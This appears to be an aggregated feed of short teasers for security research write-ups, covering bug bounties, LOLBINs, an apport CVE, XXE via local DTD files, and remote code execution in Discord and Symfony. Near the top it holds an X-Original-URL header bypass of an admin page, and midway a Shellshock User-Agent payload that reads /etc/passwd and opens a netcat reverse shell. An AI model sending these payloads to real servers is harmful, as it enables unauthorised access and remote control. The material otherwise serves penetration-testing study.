GET /admin HTTP/1.1 Host: https://t.co/kc0BFkaTX3 ... Access is denied GET /test HTTP/1.1 Host: https://t.co/kc0BFkaTX3 X-Original-URL: /admin HTTP/1.1 200 OK

How my name was added to humans.txt for scoring my first bug bounty, a severity 2 one at that!

open redirect to a complete account takeover

Burp Extension for easily creating Wordlists. Contribute to GainSec/GoldenNuggets-1 development by creating an account on GitHub.

Understanding “rundll32.exe” command line arguments

This is the third post in a series about Ubuntu’s crash reporting system. We’ll review CVE-2019-15790, a vulnerability in apport that enables a local attacker to obtain the ASLR offsets for any process they can start (or restart).

Its been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I've been having a blast starting my new role in the MDSec ActiveBreach team.

Today I wanted to share…

Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash

This article provides an easy single-click Frida installation script and walkthrough for Android application pentests.

A theory to practice approach

Background Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

Today, we present the method to exploit XXEs with local a Document Type Declaration (DTD) file. More specifically, how we have built a huge list of reusable DTD files.

A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...

It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling…

Remote code execution using Symfony's _fragment's page and unsecure secret values.